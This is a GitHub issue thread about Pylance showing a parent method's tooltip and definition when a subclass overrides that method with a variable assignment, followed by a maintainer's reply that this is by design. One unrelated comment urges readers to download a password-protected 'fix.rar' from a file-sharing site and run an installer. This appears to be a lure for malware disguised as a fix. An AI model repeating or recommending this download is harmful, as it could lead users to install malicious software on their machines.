### ISSUE TITLE
Overwriting an inherited function with a variable points not to the new function

### ISSUE THREAD

**Issue by Daraan** [microsoft/pylance-release#6306]
When not using `def` to overwrite a parent method but using a variable or import instead, the tooltip and signature of the parent is preserved instead of displaying the new one.

## Environment data

-  Using with VSCode
-   Pylance version: 2024.8.101 (pyright version 1.1.375, commit d2c0938f)
-   OS and version: Ubuntu 22.04
-   Python version: miniconda: Any

## Code Snippet

```python
def externalbar(a: int):
    """external Bar"""
    
class A:
    
    @staticmethod
    def bar(a:int):
        """This is A.bar"""
        
class B(A):
    
    bar = staticmethod(externalbar)
    # or
    # from somemodule import bar
    
    def foo(self):
        self.bar # Tooltip is: "This is A.bar"; expected 'external Bar'

B.bar # "This is A.bar"; expected 'external Bar'

```

## Expected behavior

Expected that `B.bar / self.bar` links to `externalbar` and used it as tooltip instead of using `A.bar`.

CTRL + click should send me to `externalbar`

## Actual behavior

Falls back to `A.bar` and ignores the overwrite. CTRL + click sends me to `A.bar`

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rchiodo** [comment]
Thanks for the issue but this is by design. Pylance (and Pyright that Pylance is based upon) is a static based analyzer. Dynamically changing the  value of a member at runtime cannot be modeled by Pylance. 

I believe the root problem here is it's not defined whether the A.bar definition happens before or after the assignment in B.

See these issues for more information:
https://github.com/microsoft/pyright/issues/6611
https://github.com/microsoft/pyright/issues/2912
